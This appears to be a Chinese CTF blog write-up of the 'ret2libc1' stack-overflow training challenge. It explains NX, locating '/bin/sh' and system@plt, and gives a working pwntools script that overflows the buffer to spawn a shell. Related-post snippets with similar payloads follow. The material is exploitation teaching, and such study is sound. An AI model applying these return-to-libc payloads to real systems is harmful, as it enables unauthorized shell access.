PWN —— ret2libc1

于 2022-07-03 21:11:39 发布
阅读量400 收藏
点赞数 1
分类专栏: PWN CTF训练 文章标签: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/125589315
版权
CTF训练 同时被 2 个专栏收录
46 篇文章 14 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏

拿到题目,先checksec一下:
在这里插入图片描述
发现打开了NX,栈不可执行,则不能将自己写好的shellcode放到栈中执行,用file命令,发现是动态编译的,则不能用ROPgadget,于是看下程序中是否存在后门函数,
放入ida,发现没有后门函数,只有
在这里插入图片描述
这里调用了system函数,则想法是通过栈溢出调用system函数,并且将system函数参数换成"/bin/sh"
这里便存在三个问题:1.”/bin/sh"是否存在 2.栈构造 3. system()函数调用地址
先解决第一个问题,用strings ret2libc1 | grep /bin/sh 发现存在/bin/sh
在这里插入图片描述
第二个问题栈构造,经过动态调试,栈构造如下:
在这里插入图片描述
第三个问题,system()的地址,我们没办法知道system的地址,但我们可以使用ELF知道system@plt的地址

攻击脚本:

from pwn import *
io = process("./ret2libc1")
elf = ELF("./ret2libc1")
system_plt = elf.plt["system"]
bin_sh = next(elf.search(b'/bin/sh'))
payload = 112 * b'A' + p32(system_plt) + b'AAAA' + p32(bin_sh)
io.sendline(payload)
io.interactive()

Sucessful!!!!

Mokapeng
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8027
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
PWN · ret2libc】ret2libc1
Mr_Fmnwon的博客
05-08 945
当函数运行到调用库函数时,程序将访问对应函数的plt表项,plt表项存着代码,代码分为两部分:第一部分,跳转到对应的got表。第二部分,查找函数的真实地址,修改got表内容。 got表项存着一个地址。然而这个地址并不一开始就是libc中函数的真实地址。 一开始,got表项中地址指向plt代码的第二部分。后来,因运行plt第二部分代码段,got表内容被修改为真实函数地址。依据以上,我们可以......分享几个实用的干货小技巧,不用IDA解决此题
ret2libc1
m0_54262894的博客
10-30 138
需要原文件可以找我要~ 拿到文件先checksec检查保护 放入ida中 查看main函数 发现了gets危险函数,可以利用 查看函数列表有一个secure函数,双击打开 发现了system命令 我们用Shift+F12查找有无/bin/sh 找到了 双击打开记下 /bin/sh 地址 0x08048720 有了/bin/sh,接下来寻找system的地址 我们可以在最下面看到syst...
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2191
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
CTFWiki-pwn
qq_55233040的博客
05-03 1313
stackoverflow ret2text 首先checksec一下,是32位可执行文件,没有开启保护 放入ida,shift+f12查看字符串,发现secure函数中使用system函数调用了"/bin/sh",记下地址0x804863a 查看偏移地址 脚本如下: from pwn import * io = process("./ret2text") payload = b"a"*112 + p32(0x804863a) io.sendline(payload) io.interactive(
ret2libc1pwn 入门题
02-11
pwn 入门题
ret2libc2pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
16ret2libc1_32 pwn 入门题
02-11
pwn 入门题
pwn07.ret2syscall例题
11-11
ret2syscall例题
pwn学习——ret2libc1
MrTreebook的博客
11-28 1251
pwn学习——ret2libc11.看一下程序的保护2.看一下main函数有没有溢出3.ROPgadget4.exp 1.看一下程序的保护 ➜ ret2libc1 checksec ret2libc1 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 2.看一
ROP-基础-ret2libc1
热门推荐
ATFWUS的博客
02-28 1万+
文件下载地址: 链接:https://pan.baidu.com/s/1DN4q7Dl5J45rIysA0DvZ5A 提取码:0wn8 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
PWN基础18:ret2libc 补充实例 学习
prettyX的博客
07-24 378
今天我们学习ret2libc1 先来检查一下保护情况,开启了NX保护 使用如下命令查找一下system函数 再来找一下字符串 ROPgadget --binary ./ret2libc1 --string "/bin/sh" 此时再来计算一下溢出偏移 Exp如下 #Exp.py from pwn import * context(arch="i386",os="linux",log_level="debug") p=process("./ret2libc1") e=ELF
basic rop ret2libc(1)
archli的博客
08-08 204
题目:ret2libc1 类似的题型我应该做过,就是找到system的地址和/bin/sh的地址,然后进行拼接传给系统。 wp: checksec开始: 用ida看函数: 和前面的一样不做过多的赘述 主要的思路是,要找到system和/bin/sh的地址。 寻找/bin/sh 的地址有两个方法,一个是用ida字符串: 另一种使用ROPgadget来查询字符串的位置: 查找system的地...
聊聊Linux动态链接中的PLT和GOT(3)——公共GOT表项
海枫的专栏
06-11 1万+
前文(聊聊Linux动态链接中的PLT和GOT(2)——延迟重定位)提到所有动态库函数的plt指令最终都跳进公共plt执行,那么公共plt指令里面的地址是什么鬼? 把test可执行文的共公plt贴出来: 080482a0 <common@plt>: 80482a0: pushl 0x80496f0 80482a6: jmp *0x80496f4 ... 第一句,pu...
通过pwnable.kr从零学pwn
giantbranch的专栏
07-31 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的 挑战地址:http://pwnable.kr/play.php fd 首先不用说给了就直接连上去 看一下代码 重要函数:read ssize_t read(int fd,void *
基本ROP
听鬼哥说故事
08-29 8601
随着NX保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是ROP(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上(这一条之后不再重复提及),通过利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而改变程序的执行流程。**所谓gadgets就是以ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
plt_System_Security_Cryptography_HMAC_KeySetup_byte___byte
weixin_30372371的博客
04-11 65
今天突然发现原来的HMAC加密出问题了,在IOS上怎么都用不了。。 最后才发现我在unity3d中的选项选择了去掉安全库了。。 Stripping Level,选择Use micro mscorliblevel就会去掉安全库了。 详情见: http://docs.unity3d.com/Documentation/Manual/iphone-playerSizeOptimiz...
Linux pwn入门教程(6)——格式化字符串漏洞
xiaoi123的博客
08-03 2245
作者:Tangerine@SAINTSEC 0x00 printf函数中的漏洞 printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 char s[20] = “Hello world!\n”; printf(“%s”, s); 然而,有时候为了省事也会写成 char s[20] = “Hello wor...
pwn ret2libc原理
最新发布
08-22
- *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值